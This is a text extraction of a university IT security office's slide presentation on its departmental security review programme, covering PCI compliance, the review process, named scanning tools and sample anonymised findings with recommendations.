IT Security Reviews

1
IT Security Reviews

• Brad Tilley

2
This Can Happen To Your Data
3
Purpose of Security Reviews

• Growing concern about data disclosure at
  Universities
• Executive Vice President established funds for an
  IT Security Review program
• Can be considered a pre-audit to help departments
  prepare for real audits
• Also to help ensure that offices are in
  compliance with federal and state laws.

• Identify departments on campus with sensitive
  data issues through their risk analysis
• Help departments recognize their vulnerabilities
  and offer alternatives
• Prevent data disclosures and possible
  manipulations
• - We dont want to be front page news

4
Types of Security Reviews

• Internal Payment Card Industry (PCI) Security
  review
• Depts that handle credit card transactions
• List supplied by University Controllers office
• Ensure depts are following appropriate items in
  the PCI security standard
• General Security review
• Depts that handle sensitive information
• Student information
• Confidential information
• Initial focus on academic depts
• List provided by Registrars office
• Academic depts, Deans Offices
• Sponsored Research
• Export control issues
• Human subject research

5
Security Review Process

• Entrance Meeting
• Initial documents submitted to ISO
• PCI Survey (if needed)
• Sensitive Data survey (FERPA, etc.)
• Field Work
• Document all machines
• Verify firewalls, vulnerability scans
• Penetration test
• Network and WWW based applications review
• Local system security check
• Physical security, backup check
• Mobile system review (laptop, PDA)
• Prepare report
• Review findings with client
• Exit meeting

6
Permission Memo
grant authorization to specific members of the
IT Security Office to conduct vulnerability
assessments and penetration tests against the
Universitys assets. To that end, the undersigned
attests to the following 1) ITSO has permission
to scan the University's computer equipment and
network to find vulnerabilities. 2) The Vice
President for Information Technology has the
authority to grant this permission for testing
the Universitys information technology
assets. 3) Prior Approval must be obtained from
each Department Head prior to conducting
vulnerability assessments and penetration testing
on the individual Departments information
technology assets.
7
Security Review Process
Security Review Project Plan PCI Standard
v1.1 PCI Questionnaire
8
PCI Standards

• Preferred method of handling credit card
  transactions on the web
• Use only a PCI compliant vendor
• Redirect Method

9
PCI Standards

• Preferred method of handling credit card
  transactions either in person or over the phone.
• Offline Method (via Phone Line)
• Phone line should be set to not allow incoming
  calls

10
PCI Standards

• Alternate method of handling credit card
  transactions in person or over the phone (via the
  internet)
• Secure Method (Client Processor)
• No data is stored and all incoming connection
  attempts are denied

11
PCI Standards

• Less desirable method of handling credit cards
• You take a high level of responsibility for
  payment card data
• PCI Standards require a secure infrastructure to
  be maintained
• This requires you to install and maintain
  networking hardware
• Secure Infrastructure

12
Security Review Tools

• Documentation (will be online in the future)
• Host and Application Lists
• PCI Questionnaire
• Vulnerability Scanning / Pen. Test
• Nessus
• Nmap
• Core Impact, Accunetix commercial tools
• Rapid7 Nexpose commercial tool
• Local Security
• Center for Internet Security NGTool
• Find_SSNs Find_CCNs Scan tool
• Cornell Universitys Spider
• Network Applications
• WebScarab, Paros
• Physical Security and Back-ups

The soft nougat center
13
(No Transcript)
14
(No Transcript)
15
Core Impact
16
Security Review Website
17
Security Review Website
18
Security Review Website
19
Security Review Report

• The report is the final result of the review
• Identify weaknesses and data exposures in
  departmental systems
• Report is discussed with the department technical
  contact prior to the exit meeting.
• Draft report is presented to department head at
  the exit meeting
• Changes are made if any noted in exit meeting
• Final version sent to all parties involved
  including VP for Information Technology
• Detailed review data is available on website
• If any critical issues are found, we will check
  back later to make sure changes are made

20
Example Report

• Security Review Findings
• Critical Issues
• Cross-site scripting vulnerability with ?????s
  website
• Potential Impact
• Cross-site scripting vulnerabilities allow
  hackers to redirect WWW traffic to another site
  without the users knowledge. Sensitive
  information could be sent to an unknown site
  without the senders knowledge. This
  vulnerability does not exist on any ?????
  department system, rather, it exists on the ?????
  vendor www site.
• Recommendation
• The ????? Department has notified ????? of this
  vulnerability. The department should verify the
  vulnerability has been fixed as soon as possible.
  
• Medium Security Issues
• Machine names are actual employee names
• Potential Impact
• Desktop workstations are given hostnames of the
  owner. This piece of information can be used to
  determine the sensitivity or criticality of any
  data stored on that system.
• Recommendation
• Rename all desktop workstations using a generic
  formula.

21
Example Report

• Insufficient system support personnel for future
  growth
• Potential Impact
• ????? is planning to manage a significantly
  larger number of systems in the near future.
  ????? ability to maintain a high level of
  security may decline if its computer support
  staff is not increased. A good ratio of systems
  to support staff is 201 for departments with
  significant end user support.
• Recommendation
• Consider expanding the computer system support
  staff in order to maintain the high level of
  security currently practiced by ?????. Consider
  having primary and backup staff for any critical
  support functions.
• Potentially sensitive data stored locally on
  laptops
• Potential Impact
• Laptops by nature are portable. This makes it
  easy for them to be lost or stolen. The
  University has laptops that are stolen or lost
  every year and are rarely recovered. In the
  event this happens, the first concern is that
  your department will be able to continue
  operating if data needed was lost. The second is
  the misuse of that data. Any sensitive
  information that is stored on a laptop in the
  clear will be potentially exposed.
• Recommendation
• Instruct users to minimize data stored locally on
  laptops and instead use the VPN to a file share.
  If sensitive files are stored on a laptop, follow
  the previous recommendation.

22
Example Report

• Ethernet port for kiosk partially accessible
• Potential Impact
• Each user of an Ethernet portal from CNS will be
  held responsible for any use or misuse of the
  network. If a person were to connect a machine
  to the wall portal in the hallway, and perform
  malicious activities it would be traced back to
  the owner of the portal. Note that wireless
  network access is controlled by CNS and requires
  authentication for use and is therefore traceable
  to that user.
• Recommendation
• Consider covering the wall port for the kiosk by
  either sliding the cabinet to cover it or some
  other way.
• General Recommendations (for all departments)
• Consider providing technical training for support
  personnel such as the SANS classes offered
  through the Security Office in the spring.
• Consider providing security awareness training
  for all office staff including anyone who has
  access to sensitive data.
• If your department is accepting credit card
  payments, consider using a redirecting service
  rather than storing any credit card information
  on Virginia Tech systems.

23
What weve seen so far

• Need IT Staff for Departments
• Depts w/critical data need IT support
• Central IT support isnt always the answer
• Operating System security is good
• Patches applied
• Can not gain access with Core Impact (yet)
• Digital Pack Rats
• Old spreadsheets have a high risk for data
  disclosure
• If unsure of retention, archive policies, contact
  Records Management
• Remote Access (GUI, terminal)
• Limit usage on workstations and vendors access
• Security Awareness Needed
• Every employee needs to know the policies and
  regulations (FERPA, etc.) that govern their data
• Overall, better than expected

24
Contact Information

• Brad Tilley, IT Security Analyst, 1300 Torgersen
  Hall, VA Tech, Blacksburg, VA 24060
• 540-231-0635, rtilley_at_vt.edu
• Randy Marchany, VA Tech IT Security Lab Director,
  1300 Torgersen Hall, VA Tech, Blacksburg, VA
  24060
• 540-231-9523, marchany_at_vt.edu
• http//security.vt.edu